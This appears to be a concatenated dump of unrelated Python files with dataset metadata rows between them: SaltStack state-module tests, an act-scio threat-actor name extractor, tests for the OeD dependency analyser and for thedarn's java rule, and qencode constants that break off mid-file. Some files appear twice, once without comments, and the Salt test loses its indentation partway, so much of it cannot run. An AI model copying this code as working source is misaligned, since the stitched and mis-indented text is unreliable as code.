        def verify_high(self, data):
            # -1 signals verification errors to the caller.
            data = data
            if self.flag:
                return True
            else:
                return -1
        @staticmethod
        def compile_high_data(data):
            # Canned low chunk used by the show_low_sls assertions.
            data = data
            return [{"__id__": "ABC"}]
        @staticmethod
        def call_chunk(data, data1, data2):
            data = data
            data1 = data1
            data2 = data2
            return {'': 'ABC'}
        @staticmethod
        def call_chunks(data):
            data = data
            return True
        @staticmethod
        def call_listen(data, ret):
            data = data
            ret = ret
            return True
        def requisite_in(self, data):
            return data, []
    class HighState(object):
        '''
        Fake ``salt.state.HighState``; ``flag`` steers whether rendering
        reports errors.
        '''
        flag = False
        opts = {'state_top': '',
                'pillar': {}}
        def __init__(self, opts, pillar_override=None, *args, **kwargs):
            self.building_highstate = salt.utils.odict.OrderedDict
            self.state = MockState.State(opts,
                                         pillar_override=pillar_override)
        def render_state(self, sls, saltenv, mods, matches, local=False):
            # Second tuple element is the error indicator.
            sls = sls
            saltenv = saltenv
            mods = mods
            matches = matches
            local = local
            if self.flag:
                return {}, True
            else:
                return {}, False
        @staticmethod
        def get_top():
            return "_top"
        def verify_tops(self, data):
            # Non-empty return means top-file errors.
            data = data
            if self.flag:
                return ["a", "b"]
            else:
                return []
        @staticmethod
        def top_matches(data):
            data = data
            return ["a", "b", "c"]
        @staticmethod
        def push_active():
            return True
        @staticmethod
        def compile_highstate():
            return "A"
        @staticmethod
        def compile_state_usage():
            return "A"
        @staticmethod
        def pop_active():
            return True
        @staticmethod
        def compile_low_chunks():
            return True
        def render_highstate(self, data):
            # Second tuple element is the error indicator.
            data = data
            if self.flag:
                return ["a", "b"], True
            else:
                return ["a", "b"], False
        @staticmethod
        def call_highstate(exclude, cache, cache_name, force=None,
                           whitelist=None, orchestration_jid=None):
            exclude = exclude
            cache = cache
            cache_name = cache_name
            force = force
            whitelist = whitelist
            return True
class MockSerial(object):
    '''
    Stand-in for ``salt.payload`` exposing a canned ``Serial`` class.
    '''
    def __init__(self):
        pass
    class Serial(object):
        '''
        Fake serializer: ``load`` always yields {'A': 'B'}, ``dump`` True.
        '''
        def __init__(self, data):
            # Serializer options are accepted and discarded.
            pass
        @staticmethod
        def load(data):
            # Ignore the file handle and return a fixed payload.
            return {"A": "B"}
        @staticmethod
        def dump(data, data1):
            # Pretend the payload was written successfully.
            return True
class MockTarFile(object):
    '''
    Minimal ``tarfile`` stand-in; every operation is a harmless no-op.
    '''
    # Tests reset this to simulate members inside/outside the root.
    path = os.sep + "tmp"
    def __init__(self):
        pass
    @staticmethod
    def open(data, data1):
        # Return the class itself so it behaves like an open archive.
        return MockTarFile
    @staticmethod
    def getmembers():
        # The archive contains a single member: this class.
        return [MockTarFile]
    @staticmethod
    def extractall(data):
        # Pretend extraction succeeded.
        return True
    @staticmethod
    def close():
        # Closing always succeeds.
        return True
class MockJson(object):
    '''
    ``json`` module stand-in whose ``load`` output is steered by ``flag``.
    '''
    # Class-level switch flipped by tests to pick the canned payload.
    flag = None
    def __init__(self):
        pass
    def load(self, data, object_hook=None):
        # Ignore the input and return a canned document based on ``flag``.
        return [True] if self.flag else [{"test": ""}]
@skipIf(NO_MOCK, NO_MOCK_REASON)
class StateTestCase(TestCase, LoaderModuleMockMixin):
    def setup_loader_modules(self):
        '''
        Build the loader dunder mapping for the state module and replace
        salt.modules.state.salt.state with the MockState container for
        the duration of each test.
        '''
        utils = salt.loader.utils(
            salt.config.DEFAULT_MINION_OPTS,
            whitelist=['state']
        )
        # Patch in the fake State/HighState classes; undone per test.
        patcher = patch('salt.modules.state.salt.state', MockState())
        patcher.start()
        self.addCleanup(patcher.stop)
        return {
            state: {
                '__opts__': {
                    'cachedir': '/D',
                    'environment': None,
                    '__cli': 'salt',
                },
                '__utils__': utils,
            },
        }
    def test_running(self):
        '''
        Test to return a list describing state runs currently in progress
        '''
        # Calling with True short-circuits to an empty list.
        self.assertEqual(state.running(True), [])
        # First is_running call reports one active job, second none.
        mock = MagicMock(side_effect=[[{"fun": "state.running", "pid": "4126",
                                        "jid": "20150325123407204096"}], []])
        with patch.dict(state.__salt__,
                        {'saltutil.is_running': mock}
                        ):
            # The active job is reported with its PID, start time and jid
            # (the timestamp is derived from the jid).
            self.assertListEqual(state.running(),
                                 ['The function "state.running"'
                                  ' is running as PID 4126 and '
                                  'was started at 2015, Mar 25 12:34:07.'
                                  '204096 with jid 20150325123407204096'])
            self.assertListEqual(state.running(), [])
def test_low(self):
mock = MagicMock(side_effect=[False, None, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}))
MockState.State.flag = False
self.assertEqual(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}), list)
MockState.State.flag = True
self.assertTrue(state.low({"state": "pkg", "fun": "installed",
"name": "vi"}))
def test_high(self):
mock = MagicMock(side_effect=[False, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.high({"vim": {"pkg": ["installed"]}}))
mock = MagicMock(return_value={"test": True})
with patch.object(state, '_get_opts', mock):
self.assertTrue(state.high({"vim": {"pkg": ["installed"]}}))
def test_template(self):
mock = MagicMock(side_effect=[False, None, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.template('/home/salt/salt.sls'))
MockState.HighState.flag = True
self.assertTrue(state.template('/home/salt/salt.sls'))
MockState.HighState.flag = False
self.assertTrue(state.template('/home/salt/salt.sls'))
def test_template_str(self):
mock = MagicMock(side_effect=[False, None])
with patch.object(state, '_check_queue', mock):
self.assertFalse(state.template_str('Template String'))
self.assertTrue(state.template_str('Template String'))
def test_apply_(self):
mock = MagicMock(return_value=True)
with patch.object(state, 'sls', mock):
self.assertTrue(state.apply_(True))
with patch.object(state, 'highstate', mock):
self.assertTrue(state.apply_(None))
def test_list_disabled(self):
mock = MagicMock(return_value=["A", "B", "C"])
with patch.dict(state.__salt__, {'grains.get': mock}):
self.assertListEqual(state.list_disabled(), ["A", "B", "C"])
def test_enable(self):
mock = MagicMock(return_value=["A", "B"])
with patch.dict(state.__salt__, {'grains.get': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'grains.setval': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'saltutil.refresh_modules':
mock}):
self.assertDictEqual(state.enable("A"),
{'msg': 'Info: A state enabled.',
'res': True})
self.assertDictEqual(state.enable("Z"),
{'msg': 'Info: Z state already '
'enabled.', 'res': True})
def test_disable(self):
mock = MagicMock(return_value=["C", "D"])
with patch.dict(state.__salt__, {'grains.get': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'grains.setval': mock}):
mock = MagicMock(return_value=[])
with patch.dict(state.__salt__, {'saltutil.refresh_modules':
mock}):
self.assertDictEqual(state.disable("C"),
{'msg': 'Info: C state '
'already disabled.',
'res': True})
self.assertDictEqual(state.disable("Z"),
{'msg': 'Info: Z state '
'disabled.', 'res': True})
def test_clear_cache(self):
mock = MagicMock(return_value=["A.cache.p", "B.cache.p", "C"])
with patch.object(os, 'listdir', mock):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'isfile', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'remove', mock):
self.assertEqual(state.clear_cache(),
['A.cache.p',
'B.cache.p'])
def test_single(self):
ret = {'pkg_|-name=vim_|-name=vim_|-installed': list}
mock = MagicMock(side_effect=["A", None, None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.single("pkg.installed",
" name=vim"), "A")
self.assertEqual(state.single("pk", "name=vim"),
"Invalid function passed")
with patch.dict(state.__opts__, {"test": "install"}):
mock = MagicMock(return_value={"test": ""})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.single,
"pkg.installed",
"name=vim",
pillar="A")
MockState.State.flag = True
self.assertTrue(state.single("pkg.installed",
"name=vim"))
MockState.State.flag = False
self.assertDictEqual(state.single("pkg.installed",
"name=vim"), ret)
def test_show_top(self):
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_top(), "A")
MockState.HighState.flag = True
self.assertListEqual(state.show_top(), ['a', 'b'])
MockState.HighState.flag = False
self.assertListEqual(state.show_top(), ['a', 'b', 'c'])
def test_run_request(self):
mock = MagicMock(side_effect=[{},
{"name": "A"},
{"name": {'mods': "A",
'kwargs': {}}}])
with patch.object(state, 'check_request', mock):
self.assertDictEqual(state.run_request("A"), {})
self.assertDictEqual(state.run_request("A"), {})
mock = MagicMock(return_value=["True"])
with patch.object(state, 'apply_', mock):
mock = MagicMock(return_value="")
with patch.object(os, 'remove', mock):
self.assertListEqual(state.run_request("name"),
["True"])
def test_show_highstate(self):
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_highstate(), "A")
self.assertRaises(SaltInvocationError,
state.show_highstate,
pillar="A")
self.assertEqual(state.show_highstate(), "A")
def test_show_lowstate(self):
mock = MagicMock(side_effect=["A", None])
with patch.object(state, '_check_queue', mock):
self.assertRaises(AssertionError, state.show_lowstate)
self.assertTrue(state.show_lowstate())
def test_show_state_usage(self):
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_state_usage(), "A")
self.assertRaises(SaltInvocationError,
state.show_state_usage,
pillar="A")
self.assertEqual(state.show_state_usage(), "A")
def test_sls_id(self):
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.sls_id("apache", "http"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
MockState.State.flag = True
MockState.HighState.flag = True
self.assertEqual(state.sls_id("apache", "http"), 2)
MockState.State.flag = False
self.assertDictEqual(state.sls_id("ABC", "http"),
{'': 'ABC'})
self.assertRaises(SaltInvocationError,
state.sls_id,
"DEF", "http")
def test_show_low_sls(self):
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_low_sls("foo"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
MockState.State.flag = True
MockState.HighState.flag = True
self.assertEqual(state.show_low_sls("foo"), 2)
MockState.State.flag = False
self.assertListEqual(state.show_low_sls("foo"),
[{'__id__': 'ABC'}])
def test_show_sls(self):
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.show_sls("foo"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(
return_value={'test': True,
'environment': None}
)
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.show_sls,
"foo",
pillar="A")
MockState.State.flag = True
self.assertEqual(state.show_sls("foo"), 2)
MockState.State.flag = False
self.assertListEqual(state.show_sls("foo"),
['a', 'b'])
def test_top(self):
ret = ['Pillar failed to render with the following messages:', 'E']
mock = MagicMock(side_effect=["A", None, None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.top("reverse_top.sls"), "A")
mock = MagicMock(side_effect=[False, True, True])
with patch.object(state, '_check_pillar', mock):
with patch.dict(state.__pillar__, {"_errors": "E"}):
self.assertListEqual(state.top("reverse_top.sls"), ret)
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(return_value={'test': True})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils, 'test_mode', mock):
self.assertRaises(SaltInvocationError,
state.top,
"reverse_top.sls",
pillar="A")
mock = MagicMock(
return_value
=
'salt://reverse_top.sls')
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=True)
with patch.object(state, '_set_retcode',
mock):
self.assertTrue(
state.
top("reverse_top.sls "
"exclude=exclude.sls"))
def test_highstate(self):
arg = "whitelist=sls1.sls"
mock = MagicMock(side_effect=[True, False, False, False])
with patch.object(state, '_disabled', mock):
self.assertDictEqual(state.highstate("whitelist=sls1.sls"),
{'comment': 'Disabled',
'name': 'Salt highstate run is disabled. '
'To re-enable, run state.enable highstate',
'result': 'False'})
mock = MagicMock(side_effect=["A", None, None])
with patch.object(state, '_check_queue', mock):
self.assertEqual(state.highstate("whitelist=sls1.sls"), "A")
with patch.dict(state.__opts__, {"test": "A"}):
mock = MagicMock(return_value={'test': True})
with patch.object(state, '_get_opts', mock):
self.assertRaises(SaltInvocationError,
state.highstate,
"whitelist=sls1.sls",
pillar="A")
mock = MagicMock(return_value=True)
with patch.dict(state.__salt__,
{'config.option': mock}):
mock = MagicMock(return_value="A")
with patch.object(state, '_filter_running',
mock):
mock = MagicMock(return_value=True)
with patch.object(state, '_filter_running',
mock):
mock = MagicMock(return_value=True)
with patch.object(salt.payload, 'Serial',
mock):
with patch.object(os.path,
'join', mock):
with patch.object(
state,
'_set'
'_retcode',
mock):
self.assertTrue(state.
highstate
(arg))
def test_clear_request(self):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.payload, 'Serial', mock):
mock = MagicMock(side_effect=[False, True, True])
with patch.object(os.path, 'isfile', mock):
self.assertTrue(state.clear_request("A"))
mock = MagicMock(return_value=True)
with patch.object(os, 'remove', mock):
self.assertTrue(state.clear_request())
mock = MagicMock(return_value={})
with patch.object(state, 'check_request', mock):
self.assertFalse(state.clear_request("A"))
def test_check_request(self):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock), \
patch('salt.modules.state.salt.payload', MockSerial):
mock = MagicMock(side_effect=[True, True, False])
with patch.object(os.path, 'isfile', mock):
with patch('salt.utils.files.fopen', mock_open()):
self.assertDictEqual(state.check_request(), {'A': 'B'})
with patch('salt.utils.files.fopen', mock_open()):
self.assertEqual(state.check_request("A"), 'B')
self.assertDictEqual(state.check_request(), {})
def test_request(self):
mock = MagicMock(return_value=True)
with patch.object(state, 'apply_', mock):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
mock = MagicMock(return_value=
{"test_run": "",
"mods": "",
"kwargs": ""})
with patch.object(state, 'check_request', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
with patch.object(salt.utils.platform, 'is_windows', mock):
with patch.dict(state.__salt__, {'cmd.run': mock}):
with patch('salt.utils.files.fopen', mock_open()):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
self.assertTrue(state.request("A"))
def test_sls(self):
arg = "core,edit.vim dev"
ret = ['Pillar failed to render with the following messages:', 'E', '1']
mock = MagicMock(return_value=True)
with patch.object(state, 'running', mock):
with patch.dict(state.__context__, {"retcode": 1}):
self.assertEqual(state.sls("core,edit.vim dev"), True)
mock = MagicMock(side_effect=[True, True, True, True, True, True])
with patch.object(state, '_wait', mock):
mock = MagicMock(side_effect=[["A"], [], [], [], [], []])
with patch.object(state, '_disabled', mock):
with patch.dict(state.__context__, {"retcode": 1}):
self.assertEqual(
state.sls("core,edit.vim dev",
None,
None,
True),
["A"])
mock = MagicMock(side_effect=[False,
True,
True,
True,
True])
with patch.object(state, '_check_pillar', mock):
with patch.dict(state.__context__, {"retcode": 5}):
with patch.dict(state.__pillar__, {"_errors": "E1"}):
self.assertListEqual(state.sls("core,edit.vim dev",
None,
None,
True), ret)
with patch.dict(state.__opts__, {"test": None}):
mock = MagicMock(return_value={"test": "",
"environment": None})
with patch.object(state, '_get_opts', mock):
mock = MagicMock(return_value=True)
with patch.object(salt.utils,
'test_mode',
mock):
self.assertRaises(
SaltInvocationError,
state.sls,
"core,edit.vim dev",
None,
None,
True,
pillar="A")
mock = MagicMock(return_value="/D/cache.cache.p")
with patch.object(os.path,
'join',
mock):
mock = MagicMock(return_value=True)
with patch.object(os.path,
'isfile',
mock):
with patch(
'salt.utils.files.fopen',
mock_open()):
self.assertTrue(
state.sls(arg,
None,
None,
True,
cache
=True
)
)
MockState.HighState.flag = True
self.assertTrue(state.sls("core,edit"
".vim dev",
None,
None,
True)
)
MockState.HighState.flag = False
mock = MagicMock(return_value=True)
with patch.dict(state.__salt__,
{'config.option':
mock}):
mock = MagicMock(return_value=
True)
with patch.object(
state,
'_filter_'
'running',
mock):
self.sub_test_sls()
def sub_test_sls(self):
mock = MagicMock(return_value=True)
with patch.object(os.path, 'join', mock):
with patch.object(os, 'umask', mock):
mock = MagicMock(return_value=False)
with patch.object(salt.utils.platform, 'is_windows', mock):
mock = MagicMock(return_value=True)
with patch.object(os, 'umask', mock):
with patch.object(state, '_set_retcode', mock):
with patch.dict(state.__opts__,
{"test": True}):
with patch('salt.utils.files.fopen', mock_open()):
self.assertTrue(state.sls("core,edit"
".vim dev",
None,
None,
True))
def test_pkg(self):
tar_file = os.sep + os.path.join('tmp', 'state_pkg.tgz')
mock = MagicMock(side_effect=[False, True, True, True, True, True, True, True])
with patch.object(os.path, 'isfile', mock), \
patch('salt.modules.state.tarfile', MockTarFile), \
patch('salt.modules.state.json', MockJson()):
self.assertEqual(state.pkg(tar_file, "", "md5"), {})
mock = MagicMock(side_effect=[False, 0, 0, 0, 0])
with patch.object(salt.utils.hashutils, 'get_hash', mock):
self.assertDictEqual(state.pkg(tar_file, "", "md5"), {})
self.assertDictEqual(state.pkg(tar_file, 0, "md5"), {})
MockTarFile.path = ""
MockJson.flag = True
with patch('salt.utils.files.fopen', mock_open()):
self.assertListEqual(state.pkg(tar_file, 0, "md5"), [True])
MockTarFile.path = ""
MockJson.flag = False
if six.PY2:
with patch('salt.utils.files.fopen', mock_open()), \
patch.dict(state.__utils__, {'state.check_result': MagicMock(return_value=True)}):
self.assertTrue(state.pkg(tar_file, 0, "md5"))
else:
with patch('salt.utils.files.fopen', mock_open()):
self.assertTrue(state.pkg(tar_file, 0, "md5"))
| true | true |
f723520e4799d2f7b850bf3560c2a44ea951ed9f | 1,141 | py | Python | act/scio/plugins/threatactor_pattern.py | martineian/act-scio2 | 2f103581cf7e340a1f3f7ba58038ac256c025425 | [
"0BSD"
] | null | null | null | act/scio/plugins/threatactor_pattern.py | martineian/act-scio2 | 2f103581cf7e340a1f3f7ba58038ac256c025425 | [
"0BSD"
] | null | null | null | act/scio/plugins/threatactor_pattern.py | martineian/act-scio2 | 2f103581cf7e340a1f3f7ba58038ac256c025425 | [
"0BSD"
] | null | null | null | import addict
from act.scio.aliasregex import normalize
from act.scio.vocabulary import Vocabulary
from act.scio.plugin import BasePlugin, Result
from typing import Text, List
import configparser
import os.path
def normalize_ta(name: Text) -> Text:
    """Normalize a threat-actor name: capitalize words while keeping the
    well-known abbreviations APT, BRONZE, IRON and GOLD in upper case."""
    known_abbreviations = ["APT", "BRONZE", "IRON", "GOLD"]
    return normalize(name, capitalize=True, uppercase_abbr=known_abbreviations)
class Plugin(BasePlugin):
    """Scio plugin that extracts known threat-actor names from text."""

    name = "threatactor"
    info = "Extracting references to known threat actors from a body of text"
    version = "0.2"
    dependencies: List[Text] = []

    async def analyze(self, nlpdata: addict.Dict) -> Result:
        """Search nlpdata.content for threat-actor aliases.

        The vocabulary is configured by threatactor_pattern.ini in the
        plugin config directory; matches are normalized with normalize_ta
        and returned under the "ThreatActors" key.
        """
        ini = configparser.ConfigParser()
        ini.read([os.path.join(self.configdir, "threatactor_pattern.ini")])
        # The alias file path in the ini is relative to the config dir.
        ini['threat_actor']['alias'] = os.path.join(self.configdir, ini['threat_actor']['alias'])
        vocab = Vocabulary(ini['threat_actor'])
        res = addict.Dict()
        res.ThreatActors = vocab.regex_search(
            nlpdata.content,
            normalize_result=normalize_ta,
            debug=self.debug)
        return Result(name=self.name, version=self.version, result=res)
| 28.525 | 97 | 0.66433 | import addict
from act.scio.aliasregex import normalize
from act.scio.vocabulary import Vocabulary
from act.scio.plugin import BasePlugin, Result
from typing import Text, List
import configparser
import os.path
def normalize_ta(name: Text) -> Text:
return normalize(
name,
capitalize=True,
uppercase_abbr=["APT", "BRONZE", "IRON", "GOLD"],
)
class Plugin(BasePlugin):
name = "threatactor"
info = "Extracting references to known threat actors from a body of text"
version = "0.2"
dependencies: List[Text] = []
async def analyze(self, nlpdata: addict.Dict) -> Result:
ini = configparser.ConfigParser()
ini.read([os.path.join(self.configdir, "threatactor_pattern.ini")])
ini['threat_actor']['alias'] = os.path.join(self.configdir, ini['threat_actor']['alias'])
vocab = Vocabulary(ini['threat_actor'])
res = addict.Dict()
res.ThreatActors = vocab.regex_search(
nlpdata.content,
normalize_result=normalize_ta,
debug=self.debug)
return Result(name=self.name, version=self.version, result=res)
| true | true |
f72352bb629d63729cc732c1f349130e7d89a441 | 2,813 | py | Python | tests/usecases/test_test_oed.py | fchauvel/oed | 80bf38e3d2879aa403edbdb3cf91d51dde2e9edc | [
"MIT"
] | null | null | null | tests/usecases/test_test_oed.py | fchauvel/oed | 80bf38e3d2879aa403edbdb3cf91d51dde2e9edc | [
"MIT"
] | null | null | null | tests/usecases/test_test_oed.py | fchauvel/oed | 80bf38e3d2879aa403edbdb3cf91d51dde2e9edc | [
"MIT"
] | null | null | null | #
# OeD - Open-ended Dependency Analyser
#
# Copyright (C) 2020 -- 2021 SINTEF Digital
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
#
from oed import OeD
from oed.laboratory import Laboratory
from oed.engines.os import OSPlatform
from oed.engines.vcs import RepositoryFactory, Github
from json import load as load_json_from
from tests.usecases.stubs import PackagesStub
from unittest import TestCase
class FakeGithub(Github):
    """Github stub that serves tags from a local JSON sample instead of
    calling the live Github API."""

    def __init__(self, organization, project):
        super().__init__(organization, project)

    def _request_all_tags(self):
        """Load the recorded Github tag payload from disk."""
        print("Using test data", self._SAMPLE_GITHUB_TAGS)
        with open(self._SAMPLE_GITHUB_TAGS, "r") as sample_tags:
            return load_json_from(sample_tags)

    # Canned API response used in place of a live tag listing.
    _SAMPLE_GITHUB_TAGS = "tests/data/sample_github_tags.json"
class TestPlatform(OSPlatform):
    """OSPlatform stub: replays a recorded pytest log and a saved web page
    instead of running real processes or fetching URLs."""

    def __init__(self):
        super().__init__(workspace=None, repositories=RepositoryFactory([FakeGithub]))

    def _execute_script(self):
        """Return canned pytest output instead of spawning a process."""
        return self._sample_output()
        #return self._minimal_relevant_output()

    def _sample_output(self):
        # NOTE: the recorded log is UTF-16 encoded.
        with open("tests/data/sample_pytest_output.log",
                  "r", encoding="utf-16") as sample_output:
            return sample_output.readlines()

    def _minimal_relevant_output(self):
        # Alternative fixture: only the two lines the parser cares about
        # (pytest summary and coverage TOTAL); kept for quick debugging.
        return [
            "= 1 failed, 1537 passed, 24 skipped, 8 xfailed, 25 xpassed, 7 warnings in 325.63s (0:05:25) \n",
            "TOTAL 36332 6040 13652 1471 81%\n"
        ]

    def _fetch_content(self, url):
        """Return the saved Sphinx home page regardless of the URL."""
        with open(self.SAMPLE_WEBPAGE, "r", encoding="iso-8859-1") as htmlfile:
            return htmlfile.read()

    SAMPLE_WEBPAGE = "tests/data/sphinx_homepage.html"
class TestOeD(TestCase):
    """End-to-end use case: run a testing session against recorded data."""

    def setUp(self):
        packages = PackagesStub()
        laboratory = Laboratory(platform=TestPlatform())
        self.system = OeD(packages, laboratory)

    def test_success_scenario(self):
        """A session testing sphinx==1.0 against alabaster==1.0 completes
        and reports the figures found in the recorded pytest log."""
        session = self.system.new_testing_session()
        requirements = self.system.select("Sphinx", "1.0", "alabaster")
        session.add(requirements)
        session.start()
        experiments = self.system.experiments.select(lambda r: r.subject == "sphinx==1.0" \
                                                     and r.object == "alabaster==1.0")
        self.assertEqual(1, len(experiments))
        self.assertTrue(experiments[0].is_complete)
        # 1595 = 1 failed + 1537 passed + 24 skipped + 8 xfailed
        # + 25 xpassed, the totals in the recorded summary line.
        self.assertEqual(1595, experiments[0].results.tests.count)
        self.assertAlmostEqual(81.0, experiments[0].results.tests.coverage,
                               delta=0.5)
        # 1 failed, 1537 passed, 24 skipped, 8 xfailed, 25 xpassed,
from oed import OeD
from oed.laboratory import Laboratory
from oed.engines.os import OSPlatform
from oed.engines.vcs import RepositoryFactory, Github
from json import load as load_json_from
from tests.usecases.stubs import PackagesStub
from unittest import TestCase
class FakeGithub(Github):
def __init__(self, organization, project):
super().__init__(organization, project)
def _request_all_tags(self):
print("Using test data", self._SAMPLE_GITHUB_TAGS)
with open(self._SAMPLE_GITHUB_TAGS, "r") as sample_tags:
return load_json_from(sample_tags)
_SAMPLE_GITHUB_TAGS = "tests/data/sample_github_tags.json"
class TestPlatform(OSPlatform):
def __init__(self):
super().__init__(workspace=None, repositories=RepositoryFactory([FakeGithub]))
def _execute_script(self):
return self._sample_output()
def _sample_output(self):
with open("tests/data/sample_pytest_output.log",
"r", encoding="utf-16") as sample_output:
return sample_output.readlines()
def _minimal_relevant_output(self):
return [
"= 1 failed, 1537 passed, 24 skipped, 8 xfailed, 25 xpassed, 7 warnings in 325.63s (0:05:25) \n",
"TOTAL 36332 6040 13652 1471 81%\n"
]
def _fetch_content(self, url):
with open(self.SAMPLE_WEBPAGE, "r", encoding="iso-8859-1") as htmlfile:
return htmlfile.read()
SAMPLE_WEBPAGE = "tests/data/sphinx_homepage.html"
class TestOeD(TestCase):
def setUp(self):
packages = PackagesStub()
laboratory = Laboratory(platform=TestPlatform())
self.system = OeD(packages, laboratory)
def test_success_scenario(self):
session = self.system.new_testing_session()
requirements = self.system.select("Sphinx", "1.0", "alabaster")
session.add(requirements)
session.start()
experiments = self.system.experiments.select(lambda r: r.subject == "sphinx==1.0" \
and r.object == "alabaster==1.0")
self.assertEqual(1, len(experiments))
self.assertTrue(experiments[0].is_complete)
self.assertEqual(1595, experiments[0].results.tests.count)
self.assertAlmostEqual(81.0, experiments[0].results.tests.coverage,
delta=0.5)
| true | true |
f723539640b2e7f42a07839479e26f422c6bdce6 | 511 | py | Python | tests/rules/test_java.py | frankhli843/thedarn | 9e00f854c248156fba820f39b2834e8273583984 | [
"MIT"
] | null | null | null | tests/rules/test_java.py | frankhli843/thedarn | 9e00f854c248156fba820f39b2834e8273583984 | [
"MIT"
] | null | null | null | tests/rules/test_java.py | frankhli843/thedarn | 9e00f854c248156fba820f39b2834e8273583984 | [
"MIT"
] | null | null | null | import pytest
from thedarn.rules.java import match, get_new_command
from thedarn.types import Command
@pytest.mark.parametrize(
    'command',
    [Command('java {}.java'.format(stem), '') for stem in ('foo', 'bar')])
def test_match(command):
    # Any `java <file>.java` invocation should be recognised by the rule.
    assert match(command)
@pytest.mark.parametrize(
    'command, new_command',
    [(Command('java {}.java'.format(stem), ''), 'java {}'.format(stem))
     for stem in ('foo', 'bar')])
def test_get_new_command(command, new_command):
    # The corrected command runs the class name, without the `.java` suffix.
    assert get_new_command(command) == new_command
| 28.388889 | 53 | 0.700587 | import pytest
from thedarn.rules.java import match, get_new_command
from thedarn.types import Command
@pytest.mark.parametrize('command', [
Command('java foo.java', ''),
Command('java bar.java', '')])
def test_match(command):
assert match(command)
@pytest.mark.parametrize('command, new_command', [
(Command('java foo.java', ''), 'java foo'),
(Command('java bar.java', ''), 'java bar')])
def test_get_new_command(command, new_command):
assert get_new_command(command) == new_command
| true | true |
f72355e351b3bf3fb5c4715c734eb3925fc41ea8 | 753 | py | Python | qencode/const.py | peergradeio/qencode-api-python-client | c46ababbb02b164005c0c7c90b189ed5e24659bb | [
"MIT"
] | 9 | 2019-06-24T19:57:11.000Z | 2020-12-21T22:25:23.000Z | qencode/const.py | peergradeio/qencode-api-python-client | c46ababbb02b164005c0c7c90b189ed5e24659bb | [
"MIT"
] | 10 | 2020-07-06T22:34:14.000Z | 2022-02-24T22:16:05.000Z | qencode/const.py | peergradeio/qencode-api-python-client | c46ababbb02b164005c0c7c90b189ed5e24659bb | [
"MIT"
] | 5 | 2020-05-06T12:35:42.000Z | 2020-11-12T08:50:32.000Z | REPEAT = 32
# Polling behaviour while waiting for a transcoding task to finish.
SLEEP_REGULAR = 10
SLEEP_ERROR = 60
# Task statuses that mean the job has finished successfully.
COMPLETED_STATUS = ['completed', 'saved']
# API error codes returned by the qencode service.
ERROR_OK = 0
ERROR_SERVER_INTERNAL = 1
ERROR_BAD_APP_ID = 2
ERROR_APP_ID_NOT_FOUND = 3
ERROR_BAD_TOKEN = 4
ERROR_TOKEN_NOT_FOUND = 5
ERROR_TARIFF_NOT_PAID = 6
ERROR_MASTER_NOT_FOUND = 7
ERROR_SYSTEM_BUSY = 8
ERROR_BAD_PAYLOAD = 9
ERROR_PROJECT_NOT_FOUND = 10
ERROR_BAD_PROFILE = 11
ERROR_PROFILE_NOT_FOUND = 12
ERROR_BAD_TOKENS = 13
ERROR_FIELD_REQUIRED = 14
# EZDRM key-generator endpoints; placeholders are key, user, password.
# m=2 selects FairPlay (FPS), m=1 selects Common Encryption (CENC).
FPS_DRM_KEYGENERATOR_URI_TEMPLATE = (
    'https://cpix.ezdrm.com/KeyGenerator/cpix.aspx?k=%s&u=%s&p=%s&c=resourcename&m=2'
)
CENC_DRM_KEYGENERATOR_URI_TEMPLATE = (
    'https://cpix.ezdrm.com/KeyGenerator/cpix.aspx?k=%s&u=%s&p=%s&c=resourcename&m=1'
)
# skd:// URL template used as the FairPlay key-delivery address.
DRM_KEY_URL_TEMPLATE = 'skd://fps.ezdrm.com/;%s'
| 25.965517 | 85 | 0.774236 | REPEAT = 32
SLEEP_REGULAR = 10
SLEEP_ERROR = 60
COMPLETED_STATUS = ['completed', 'saved']
ERROR_OK = 0
ERROR_SERVER_INTERNAL = 1
ERROR_BAD_APP_ID = 2
